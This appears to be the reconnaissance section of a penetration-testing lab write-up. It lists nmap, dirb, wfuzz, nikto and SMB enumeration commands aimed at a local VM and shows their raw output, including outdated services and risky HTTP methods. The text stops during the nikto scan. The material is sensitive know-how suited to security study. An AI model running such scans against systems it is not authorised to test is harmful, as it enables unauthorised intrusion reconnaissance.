Scenario: let's try the following enumeration commands:
netdiscover -r 192.168.180.0/24
nmap -sV -T4 -O -F --version-light 192.168.180.138
nmap -sC -sS -T4 -A -v -v -Pn 192.168.180.138
nmap -sC -sU -T4 -A -v -v -Pn --top-ports 200 192.168.180.138
dirb http://192.168.180.138
wfuzz -c -z file,/usr/share/wfuzz/wordlist/general/big.txt --hc 404 http://192.168.180.138/FUZZ
nikto -h 192.168.180.138
In case there is SMB:
smbclient -N -L 192.168.180.138
enum4linux -a 192.168.180.138
netdiscover -r 192.168.180.0/24
Currently scanning: Finished! | Screen View: Unique Hosts
4 Captured ARP Req/Rep packets, from 4 hosts. Total size: 240
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.180.1 00:50:56:c0:00:08 1 60 VMware, Inc.
192.168.180.2 00:50:56:f9:f6:4a 1 60 VMware, Inc.
192.168.180.138 00:0c:29:04:7c:66 1 60 VMware, Inc.
192.168.180.254 00:50:56:fa:45:3e 1 60 VMware, Inc.
nmap -sV -T4 -O -F --version-light 192.168.180.138
Starting Nmap 7.01 ( https://nmap.org ) at 2016-08-09 01:49 EDT
Nmap scan report for 192.168.180.138
Host is up (0.00015s latency).
Not shown: 94 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 3.9p1 (protocol 1.99)
80/tcp open http Apache httpd 2.0.52 ((CentOS))
111/tcp open rpcbind
443/tcp open ssl/http Apache httpd 2.0.52 ((CentOS))
631/tcp open ipp CUPS 1.1
3306/tcp open mysql MySQL (unauthorized)
MAC Address: 00:0C:29:04:7C:66 (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.30
Network Distance: 1 hop
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 28.46 seconds
nmap -sC -sS -T4 -A -v -v -Pn 192.168.180.138
Starting Nmap 7.01 ( https://nmap.org ) at 2016-08-09 01:50 EDT
NSE: Loaded 132 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 01:50
Completed NSE at 01:50, 0.00s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 01:50
Completed NSE at 01:50, 0.00s elapsed
Initiating ARP Ping Scan at 01:50
Scanning 192.168.180.138 [1 port]
Completed ARP Ping Scan at 01:50, 0.02s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 01:50
Completed Parallel DNS resolution of 1 host. at 01:50, 13.00s elapsed
Initiating SYN Stealth Scan at 01:50
Scanning 192.168.180.138 [1000 ports]
Discovered open port 80/tcp on 192.168.180.138
Discovered open port 443/tcp on 192.168.180.138
Discovered open port 3306/tcp on 192.168.180.138
Discovered open port 111/tcp on 192.168.180.138
Discovered open port 22/tcp on 192.168.180.138
Discovered open port 631/tcp on 192.168.180.138
Discovered open port 843/tcp on 192.168.180.138
Completed SYN Stealth Scan at 01:50, 0.04s elapsed (1000 total ports)
Initiating Service scan at 01:50
Scanning 7 services on 192.168.180.138
Completed Service scan at 01:51, 12.03s elapsed (7 services on 1 host)
Initiating OS detection (try #1) against 192.168.180.138
NSE: Script scanning 192.168.180.138.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 01:51
Completed NSE at 01:51, 2.13s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 01:51
Completed NSE at 01:51, 0.00s elapsed
Nmap scan report for 192.168.180.138
Host is up, received arp-response (0.00015s latency).
Scanned at 2016-08-09 01:50:35 EDT for 29s
Not shown: 993 closed ports
Reason: 993 resets
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 64 OpenSSH 3.9p1 (protocol 1.99)
| ssh-hostkey:
| 1024 8f:3e:8b:1e:58:63:fe:cf:27:a3:18:09:3b:52:cf:72 (RSA1)
| 1024 35 149174282886581624883868648302761292182406879108668063702143177994710569161669502445416601666211201346192352271911333433971833283425439634231257314174441054335295864218587993634534355128377261436615077053235666774641007412196140534221696911370388178873572900977872600139866890316021962605461192127591516843621
| 1024 34:6b:45:3d:ba:ce:ca:b2:53:55:ef:1e:43:70:38:36 (DSA)
| ssh-dss AAAAB3NzaC1kc3MAAACBAOWJ2N2BPBPm0HxCi630ZxHtTNMh+uVkeYCkKVNxavZkcJdpfFTOGZp054sj27mVZVtCeNMHhzAUpvRisn/cH4k4plLd1m8HACAVPtcgRrshCzb7wzQikrP+byCVypE0RpkQcDya+ngDMVzrkA+9KQSR/5W6BjldLW60A5oZgyfvAAAAFQC/iRZe4LlaYXwHvYYDpjnoCPY3xQAAAIBKFGl/zr/u1JxCV8a9dIAMIE0rk0jYtwvpDCdBre450ruoLII/hsparzdJs898SMWX1kEzigzUdtobDVT8nWdJAVRHCm8ruy4IQYIdtjYowXD7hxZTy/F0xOsiTRWBYMQPe8lW1oA+xabqlnCO3ppjmBecVlCwEMoeefnwGWAkxwAAAIAKajcioQiMDYW7veV13Yjmag6wyIia9+V9aO8JmgMi3cNr04Vl0FF+n7OIZ5QYvpSKcQgRzwNylEW5juV0Xh96m2g3rqEvDd4kTttCDlOltPgP6q6Z8JI0IGzcIGYBy6UWdIxj9D7F2ccc7fAM2o22+qgFp+FFiLeFDVbRhYz4sg==
| 1024 68:4d:8c:bb:b6:5a:bd:79:71:b8:71:47:ea:00:42:61 (RSA)
|_ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEA4j5XFFw9Km2yphjpu1gzDBglGSpMxtR8zOvpH9gUbOMXXbCQeXgOK3rs4cs/j75G54jALm99Ky7tgToNaEuxmQmwnpYk9bntoDu9SkiT/hPZdOwq40yrfWIHzlUNWTpY3okTdf/YNUAdl4NOBOYbf0x/dsAdHHqSWnvZmruFA6M=
|_sshv1: Server supports SSHv1
80/tcp open http syn-ack ttl 64 Apache httpd 2.0.52 ((CentOS))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.0.52 (CentOS)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
111/tcp open rpcbind syn-ack ttl 64 2 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2 111/tcp rpcbind
| 100000 2 111/udp rpcbind
| 100024 1 840/udp status
|_ 100024 1 843/tcp status
443/tcp open ssl/http syn-ack ttl 64 Apache httpd 2.0.52 ((CentOS))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.0.52 (CentOS)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--/localityName=SomeCity/emailAddress=root@localhost.localdomain/organizationalUnitName=SomeOrganizationalUnit
| Issuer: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--/localityName=SomeCity/emailAddress=root@localhost.localdomain/organizationalUnitName=SomeOrganizationalUnit
| Public Key type: rsa
| Public Key bits: 1024
| Signature Algorithm: md5WithRSAEncryption
| Not valid before: 2009-10-08T00:10:47
| Not valid after: 2010-10-08T00:10:47
| MD5: 01de 29f9 fbfb 2eb2 beaf e624 3157 090f
|_SHA-1: 560c 9196 6506 fb0f fb81 66b1 ded3 ac11 2ed4 808a
|_ssl-date: 2016-08-09T02:41:19+00:00; -3h09m45s from scanner time.
| sslv2:
| SSLv2 supported
| ciphers:
| SSL2_DES_192_EDE3_CBC_WITH_MD5
| SSL2_RC2_CBC_128_CBC_WITH_MD5
| SSL2_RC4_128_WITH_MD5
| SSL2_RC4_64_WITH_MD5
| SSL2_DES_64_CBC_WITH_MD5
| SSL2_RC2_CBC_128_CBC_WITH_MD5
|_ SSL2_RC4_128_EXPORT40_WITH_MD5
631/tcp open ipp syn-ack ttl 64 CUPS 1.1
| http-methods:
| Supported Methods: GET HEAD OPTIONS POST PUT
|_ Potentially risky methods: PUT
|_http-server-header: CUPS/1.1
|_http-title: 403 Forbidden
843/tcp open status syn-ack ttl 64 1 (RPC #100024)
3306/tcp open mysql syn-ack ttl 64 MySQL (unauthorized)
MAC Address: 00:0C:29:04:7C:66 (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.30
TCP/IP fingerprint:
Uptime guess: 0.003 days (since Tue Aug 9 01:47:22 2016)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=196 (Good luck!)
IP ID Sequence Generation: All zeros
TRACEROUTE
HOP RTT ADDRESS
1 0.15 ms 192.168.180.138
NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 01:51
Completed NSE at 01:51, 0.00s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 01:51
Completed NSE at 01:51, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 29.42 seconds
Raw packets sent: 1020 (45.626KB) | Rcvd: 1016 (41.366KB)
nmap -sC -sU -T4 -A -v -v -Pn --top-ports 200 192.168.180.138
Starting Nmap 7.01 ( https://nmap.org ) at 2016-08-09 01:52 EDT
PORT STATE SERVICE REASON VERSION
68/udp open|filtered dhcpc no-response
111/udp open rpcbind udp-response ttl 64 2 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2 111/tcp rpcbind
| 100000 2 111/udp rpcbind
| 100024 1 840/udp status
|_ 100024 1 843/tcp status
631/udp open|filtered ipp no-response
683/udp open|filtered corba-iiop no-response
1021/udp open|filtered exp1 no-response
1024/udp open|filtered unknown no-response
1054/udp open|filtered brvread no-response
6971/udp open|filtered unknown no-response
9020/udp open|filtered tambora no-response
17018/udp open|filtered unknown no-response
18228/udp open|filtered unknown no-response
19956/udp open|filtered unknown no-response
20309/udp open|filtered unknown no-response
20665/udp open|filtered unknown no-response
21298/udp open|filtered unknown no-response
22739/udp open|filtered unknown no-response
26966/udp open|filtered unknown no-response
29823/udp open|filtered unknown no-response
30303/udp open|filtered unknown no-response
32771/udp open|filtered sometimes-rpc6 no-response
47624/udp open|filtered directplaysrvr no-response
49156/udp open|filtered unknown no-response
49393/udp open|filtered unknown no-response
60423/udp open|filtered unknown no-response
MAC Address: 00:0C:29:04:7C:66 (VMware)
Too many fingerprints match this host to give specific OS details
TCP/IP fingerprint:
Network Distance: 1 hop
TRACEROUTE
HOP RTT ADDRESS
1 0.21 ms 192.168.180.138
NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 02:11
Completed NSE at 02:11, 0.00s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 02:11
Completed NSE at 02:11, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1149.92 seconds
Raw packets sent: 1574 (46.348KB) | Rcvd: 1071 (61.672KB)
dirb http://192.168.180.138
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Tue Aug 9 02:12:19 2016
URL_BASE: http://192.168.180.138/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.180.138/ ----
+ http://192.168.180.138/cgi-bin/ (CODE:403|SIZE:291)
+ http://192.168.180.138/index.php (CODE:200|SIZE:667)
==> DIRECTORY: http://192.168.180.138/manual/
+ http://192.168.180.138/usage (CODE:403|SIZE:288)
---- Entering directory: http://192.168.180.138/manual/ ----
==> DIRECTORY: http://192.168.180.138/manual/de/
==> DIRECTORY: http://192.168.180.138/manual/developer/
==> DIRECTORY: http://192.168.180.138/manual/en/
==> DIRECTORY: http://192.168.180.138/manual/faq/
==> DIRECTORY: http://192.168.180.138/manual/fr/
==> DIRECTORY: http://192.168.180.138/manual/howto/
==> DIRECTORY: http://192.168.180.138/manual/images/
+ http://192.168.180.138/manual/index.html (CODE:200|SIZE:7234)
==> DIRECTORY: http://192.168.180.138/manual/ja/
==> DIRECTORY: http://192.168.180.138/manual/ko/
+ http://192.168.180.138/manual/LICENSE (CODE:200|SIZE:11358)
==> DIRECTORY: http://192.168.180.138/manual/misc/
==> DIRECTORY: http://192.168.180.138/manual/mod/
==> DIRECTORY: http://192.168.180.138/manual/programs/
==> DIRECTORY: http://192.168.180.138/manual/ru/
==> DIRECTORY: http://192.168.180.138/manual/ssl/
==> DIRECTORY: http://192.168.180.138/manual/style/
---- Entering directory: http://192.168.180.138/manual/de/ ----
+ http://192.168.180.138/manual/de/de (CODE:301|SIZE:321)
==> DIRECTORY: http://192.168.180.138/manual/de/developer/
+ http://192.168.180.138/manual/de/en (CODE:301|SIZE:321)
==> DIRECTORY: http://192.168.180.138/manual/de/faq/
+ http://192.168.180.138/manual/de/fr (CODE:301|SIZE:321)
==> DIRECTORY: http://192.168.180.138/manual/de/howto/
==> DIRECTORY: http://192.168.180.138/manual/de/images/
+ http://192.168.180.138/manual/de/index.html (CODE:200|SIZE:7317)
+ http://192.168.180.138/manual/de/ja (CODE:301|SIZE:321)
+ http://192.168.180.138/manual/de/ko (CODE:301|SIZE:321)
+ http://192.168.180.138/manual/de/LICENSE (CODE:200|SIZE:11358)
==> DIRECTORY: http://192.168.180.138/manual/de/misc/
==> DIRECTORY: http://192.168.180.138/manual/de/mod/
==> DIRECTORY: http://192.168.180.138/manual/de/programs/
+ http://192.168.180.138/manual/de/ru (CODE:301|SIZE:321)
==> DIRECTORY: http://192.168.180.138/manual/de/ssl/
==> DIRECTORY: http://192.168.180.138/manual/de/style/
---- Entering directory: http://192.168.180.138/manual/developer/ ----
+ http://192.168.180.138/manual/developer/index.html (CODE:200|SIZE:4770)
---- Entering directory: http://192.168.180.138/manual/en/ ----
+ http://192.168.180.138/manual/en/de (CODE:301|SIZE:321)
==> DIRECTORY: http://192.168.180.138/manual/en/developer/
+ http://192.168.180.138/manual/en/en (CODE:301|SIZE:321)
==> DIRECTORY: http://192.168.180.138/manual/en/faq/
+ http://192.168.180.138/manual/en/fr (CODE:301|SIZE:321)
==> DIRECTORY: http://192.168.180.138/manual/en/howto/
==> DIRECTORY: http://192.168.180.138/manual/en/images/
+ http://192.168.180.138/manual/en/index.html (CODE:200|SIZE:7234)
+ http://192.168.180.138/manual/en/ja (CODE:301|SIZE:321)
+ http://192.168.180.138/manual/en/ko (CODE:301|SIZE:321)
+ http://192.168.180.138/manual/en/LICENSE (CODE:200|SIZE:11358)
==> DIRECTORY: http://192.168.180.138/manual/en/misc/
==> DIRECTORY: http://192.168.180.138/manual/en/mod/
==> DIRECTORY: http://192.168.180.138/manual/en/programs/
+ http://192.168.180.138/manual/en/ru (CODE:301|SIZE:321)
==> DIRECTORY: http://192.168.180.138/manual/en/ssl/
==> DIRECTORY: http://192.168.180.138/manual/en/style/
---- Entering directory: http://192.168.180.138/manual/faq/ ----
+ http://192.168.180.138/manual/faq/index.html (CODE:200|SIZE:3564)
---- Entering directory: http://192.168.180.138/manual/fr/ ----
+ http://192.168.180.138/manual/fr/de (CODE:301|SIZE:321)
==> DIRECTORY: http://192.168.180.138/manual/fr/developer/
+ http://192.168.180.138/manual/fr/en (CODE:301|SIZE:321)
==> DIRECTORY: http://192.168.180.138/manual/fr/faq/
+ http://192.168.180.138/manual/fr/fr (CODE:301|SIZE:321)
==> DIRECTORY: http://192.168.180.138/manual/fr/howto/
==> DIRECTORY: http://192.168.180.138/manual/fr/images/
+ http://192.168.180.138/manual/fr/index.html (CODE:200|SIZE:7234)
+ http://192.168.180.138/manual/fr/ja (CODE:301|SIZE:321)
+ http://192.168.180.138/manual/fr/ko (CODE:301|SIZE:321)
+ http://192.168.180.138/manual/fr/LICENSE (CODE:200|SIZE:11358)
==> DIRECTORY: http://192.168.180.138/manual/fr/misc/
==> DIRECTORY: http://192.168.180.138/manual/fr/mod/
==> DIRECTORY: http://192.168.180.138/manual/fr/programs/
+ http://192.168.180.138/manual/fr/ru (CODE:301|SIZE:321)
==> DIRECTORY: http://192.168.180.138/manual/fr/ssl/
==> DIRECTORY: http://192.168.180.138/manual/fr/style/
---- Entering directory: http://192.168.180.138/manual/howto/ ----
+ http://192.168.180.138/manual/howto/index.html (CODE:200|SIZE:5685)
---- Entering directory: http://192.168.180.138/manual/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.180.138/manual/ja/ ----
+ http://192.168.180.138/manual/ja/de (CODE:301|SIZE:321)
==> DIRECTORY: http://192.168.180.138/manual/ja/developer/
+ http://192.168.180.138/manual/ja/en (CODE:301|SIZE:321)
==> DIRECTORY: http://192.168.180.138/manual/ja/faq/
+ http://192.168.180.138/manual/ja/fr (CODE:301|SIZE:321)
==> DIRECTORY: http://192.168.180.138/manual/ja/howto/
==> DIRECTORY: http://192.168.180.138/manual/ja/images/
+ http://192.168.180.138/manual/ja/index.html (CODE:200|SIZE:7227)
+ http://192.168.180.138/manual/ja/ja (CODE:301|SIZE:321)
+ http://192.168.180.138/manual/ja/ko (CODE:301|SIZE:321)
+ http://192.168.180.138/manual/ja/LICENSE (CODE:200|SIZE:11358)
==> DIRECTORY: http://192.168.180.138/manual/ja/misc/
==> DIRECTORY: http://192.168.180.138/manual/ja/mod/
==> DIRECTORY: http://192.168.180.138/manual/ja/programs/
+ http://192.168.180.138/manual/ja/ru (CODE:301|SIZE:321)
==> DIRECTORY: http://192.168.180.138/manual/ja/ssl/
==> DIRECTORY: http://192.168.180.138/manual/ja/style/
---- Entering directory: http://192.168.180.138/manual/ko/ ----
+ http://192.168.180.138/manual/ko/de (CODE:301|SIZE:321)
==> DIRECTORY: http://192.168.180.138/manual/ko/developer/
+ http://192.168.180.138/manual/ko/en (CODE:301|SIZE:321)
==> DIRECTORY: http://192.168.180.138/manual/ko/faq/
+ http://192.168.180.138/manual/ko/fr (CODE:301|SIZE:321)
==> DIRECTORY: http://192.168.180.138/manual/ko/howto/
==> DIRECTORY: http://192.168.180.138/manual/ko/images/
+ http://192.168.180.138/manual/ko/index.html (CODE:200|SIZE:6954)
+ http://192.168.180.138/manual/ko/ja (CODE:301|SIZE:321)
+ http://192.168.180.138/manual/ko/ko (CODE:301|SIZE:321)
+ http://192.168.180.138/manual/ko/LICENSE (CODE:200|SIZE:11358)
==> DIRECTORY: http://192.168.180.138/manual/ko/misc/
==> DIRECTORY: http://192.168.180.138/manual/ko/mod/
==> DIRECTORY: http://192.168.180.138/manual/ko/programs/
+ http://192.168.180.138/manual/ko/ru (CODE:301|SIZE:321)
==> DIRECTORY: http://192.168.180.138/manual/ko/ssl/
==> DIRECTORY: http://192.168.180.138/manual/ko/style/
---- Entering directory: http://192.168.180.138/manual/misc/ ----
+ http://192.168.180.138/manual/misc/index.html (CODE:200|SIZE:5491)
---- Entering directory: http://192.168.180.138/manual/mod/ ----
+ http://192.168.180.138/manual/mod/index.html (CODE:200|SIZE:13437)
---- Entering directory: http://192.168.180.138/manual/programs/ ----
+ http://192.168.180.138/manual/programs/index.html (CODE:200|SIZE:4664)
---- Entering directory: http://192.168.180.138/manual/ru/ ----
+ http://192.168.180.138/manual/ru/de (CODE:301|SIZE:321)
==> DIRECTORY: http://192.168.180.138/manual/ru/developer/
+ http://192.168.180.138/manual/ru/en (CODE:301|SIZE:321)
==> DIRECTORY: http://192.168.180.138/manual/ru/faq/
+ http://192.168.180.138/manual/ru/fr (CODE:301|SIZE:321)
==> DIRECTORY: http://192.168.180.138/manual/ru/howto/
==> DIRECTORY: http://192.168.180.138/manual/ru/images/
+ http://192.168.180.138/manual/ru/index.html (CODE:200|SIZE:7277)
+ http://192.168.180.138/manual/ru/ja (CODE:301|SIZE:321)
+ http://192.168.180.138/manual/ru/ko (CODE:301|SIZE:321)
+ http://192.168.180.138/manual/ru/LICENSE (CODE:200|SIZE:11358)
==> DIRECTORY: http://192.168.180.138/manual/ru/misc/
==> DIRECTORY: http://192.168.180.138/manual/ru/mod/
==> DIRECTORY: http://192.168.180.138/manual/ru/programs/
+ http://192.168.180.138/manual/ru/ru (CODE:301|SIZE:321)
==> DIRECTORY: http://192.168.180.138/manual/ru/ssl/
==> DIRECTORY: http://192.168.180.138/manual/ru/style/
---- Entering directory: http://192.168.180.138/manual/ssl/ ----
+ http://192.168.180.138/manual/ssl/index.html (CODE:200|SIZE:3988)
---- Entering directory: http://192.168.180.138/manual/style/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.180.138/manual/de/developer/ ----
+ http://192.168.180.138/manual/de/developer/index.html (CODE:200|SIZE:4770)
---- Entering directory: http://192.168.180.138/manual/de/faq/ ----
+ http://192.168.180.138/manual/de/faq/index.html (CODE:200|SIZE:3564)
---- Entering directory: http://192.168.180.138/manual/de/howto/ ----
+ http://192.168.180.138/manual/de/howto/index.html (CODE:200|SIZE:5685)
---- Entering directory: http://192.168.180.138/manual/de/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.180.138/manual/de/misc/ ----
+ http://192.168.180.138/manual/de/misc/index.html (CODE:200|SIZE:5491)
---- Entering directory: http://192.168.180.138/manual/de/mod/ ----
+ http://192.168.180.138/manual/de/mod/index.html (CODE:200|SIZE:13561)
---- Entering directory: http://192.168.180.138/manual/de/programs/ ----
+ http://192.168.180.138/manual/de/programs/index.html (CODE:200|SIZE:4664)
---- Entering directory: http://192.168.180.138/manual/de/ssl/ ----
+ http://192.168.180.138/manual/de/ssl/index.html (CODE:200|SIZE:3988)
---- Entering directory: http://192.168.180.138/manual/de/style/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.180.138/manual/en/developer/ ----
+ http://192.168.180.138/manual/en/developer/index.html (CODE:200|SIZE:4770)
---- Entering directory: http://192.168.180.138/manual/en/faq/ ----
+ http://192.168.180.138/manual/en/faq/index.html (CODE:200|SIZE:3564)
---- Entering directory: http://192.168.180.138/manual/en/howto/ ----
+ http://192.168.180.138/manual/en/howto/index.html (CODE:200|SIZE:5685)
---- Entering directory: http://192.168.180.138/manual/en/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.180.138/manual/en/misc/ ----
+ http://192.168.180.138/manual/en/misc/index.html (CODE:200|SIZE:5491)
---- Entering directory: http://192.168.180.138/manual/en/mod/ ----
+ http://192.168.180.138/manual/en/mod/index.html (CODE:200|SIZE:13437)
---- Entering directory: http://192.168.180.138/manual/en/programs/ ----
+ http://192.168.180.138/manual/en/programs/index.html (CODE:200|SIZE:4664)
---- Entering directory: http://192.168.180.138/manual/en/ssl/ ----
+ http://192.168.180.138/manual/en/ssl/index.html (CODE:200|SIZE:3988)
---- Entering directory: http://192.168.180.138/manual/en/style/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.180.138/manual/fr/developer/ ----
+ http://192.168.180.138/manual/fr/developer/index.html (CODE:200|SIZE:4770)
---- Entering directory: http://192.168.180.138/manual/fr/faq/ ----
+ http://192.168.180.138/manual/fr/faq/index.html (CODE:200|SIZE:3564)
---- Entering directory: http://192.168.180.138/manual/fr/howto/ ----
+ http://192.168.180.138/manual/fr/howto/index.html (CODE:200|SIZE:5685)
---- Entering directory: http://192.168.180.138/manual/fr/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.180.138/manual/fr/misc/ ----
+ http://192.168.180.138/manual/fr/misc/index.html (CODE:200|SIZE:5491)
---- Entering directory: http://192.168.180.138/manual/fr/mod/ ----
+ http://192.168.180.138/manual/fr/mod/index.html (CODE:200|SIZE:13437)
---- Entering directory: http://192.168.180.138/manual/fr/programs/ ----
+ http://192.168.180.138/manual/fr/programs/index.html (CODE:200|SIZE:4664)
---- Entering directory: http://192.168.180.138/manual/fr/ssl/ ----
+ http://192.168.180.138/manual/fr/ssl/index.html (CODE:200|SIZE:3988)
---- Entering directory: http://192.168.180.138/manual/fr/style/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.180.138/manual/ja/developer/ ----
+ http://192.168.180.138/manual/ja/developer/index.html (CODE:200|SIZE:4770)
---- Entering directory: http://192.168.180.138/manual/ja/faq/ ----
+ http://192.168.180.138/manual/ja/faq/index.html (CODE:200|SIZE:3564)
---- Entering directory: http://192.168.180.138/manual/ja/howto/ ----
+ http://192.168.180.138/manual/ja/howto/index.html (CODE:200|SIZE:5607)
---- Entering directory: http://192.168.180.138/manual/ja/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.180.138/manual/ja/misc/ ----
+ http://192.168.180.138/manual/ja/misc/index.html (CODE:200|SIZE:5491)
---- Entering directory: http://192.168.180.138/manual/ja/mod/ ----
+ http://192.168.180.138/manual/ja/mod/index.html (CODE:200|SIZE:13298)
---- Entering directory: http://192.168.180.138/manual/ja/programs/ ----
+ http://192.168.180.138/manual/ja/programs/index.html (CODE:200|SIZE:4664)
---- Entering directory: http://192.168.180.138/manual/ja/ssl/ ----
+ http://192.168.180.138/manual/ja/ssl/index.html (CODE:200|SIZE:3957)
---- Entering directory: http://192.168.180.138/manual/ja/style/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.180.138/manual/ko/developer/ ----
+ http://192.168.180.138/manual/ko/developer/index.html (CODE:200|SIZE:4770)
---- Entering directory: http://192.168.180.138/manual/ko/faq/ ----
+ http://192.168.180.138/manual/ko/faq/index.html (CODE:200|SIZE:3371)
---- Entering directory: http://192.168.180.138/manual/ko/howto/ ----
+ http://192.168.180.138/manual/ko/howto/index.html (CODE:200|SIZE:5299)
---- Entering directory: http://192.168.180.138/manual/ko/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.180.138/manual/ko/misc/ ----
+ http://192.168.180.138/manual/ko/misc/index.html (CODE:200|SIZE:5491)
---- Entering directory: http://192.168.180.138/manual/ko/mod/ ----
+ http://192.168.180.138/manual/ko/mod/index.html (CODE:200|SIZE:12795)
---- Entering directory: http://192.168.180.138/manual/ko/programs/ ----
+ http://192.168.180.138/manual/ko/programs/index.html (CODE:200|SIZE:4543)
---- Entering directory: http://192.168.180.138/manual/ko/ssl/ ----
+ http://192.168.180.138/manual/ko/ssl/index.html (CODE:200|SIZE:3988)
---- Entering directory: http://192.168.180.138/manual/ko/style/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.180.138/manual/ru/developer/ ----
+ http://192.168.180.138/manual/ru/developer/index.html (CODE:200|SIZE:4770)
---- Entering directory: http://192.168.180.138/manual/ru/faq/ ----
+ http://192.168.180.138/manual/ru/faq/index.html (CODE:200|SIZE:3564)
---- Entering directory: http://192.168.180.138/manual/ru/howto/ ----
+ http://192.168.180.138/manual/ru/howto/index.html (CODE:200|SIZE:5685)
---- Entering directory: http://192.168.180.138/manual/ru/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.180.138/manual/ru/misc/ ----
+ http://192.168.180.138/manual/ru/misc/index.html (CODE:200|SIZE:5491)
---- Entering directory: http://192.168.180.138/manual/ru/mod/ ----
+ http://192.168.180.138/manual/ru/mod/index.html (CODE:200|SIZE:13437)
---- Entering directory: http://192.168.180.138/manual/ru/programs/ ----
+ http://192.168.180.138/manual/ru/programs/index.html (CODE:200|SIZE:5016)
---- Entering directory: http://192.168.180.138/manual/ru/ssl/ ----
+ http://192.168.180.138/manual/ru/ssl/index.html (CODE:200|SIZE:3988)
---- Entering directory: http://192.168.180.138/manual/ru/style/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
-----------------
END_TIME: Tue Aug 9 02:13:55 2016
DOWNLOADED: 262884 - FOUND: 102
nikto -h 192.168.180.138
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.180.138
+ Target Hostname: 192.168.180.138
+ Target Port: 80
+ Start Time: 2016-08-09 02:15:09 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.0.52 (CentOS)
+ Retrieved x-powered-by header: PHP/4.3.9
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Apache/2.0.52 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current.
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS, TRACE
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ OSVDB-12184: /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
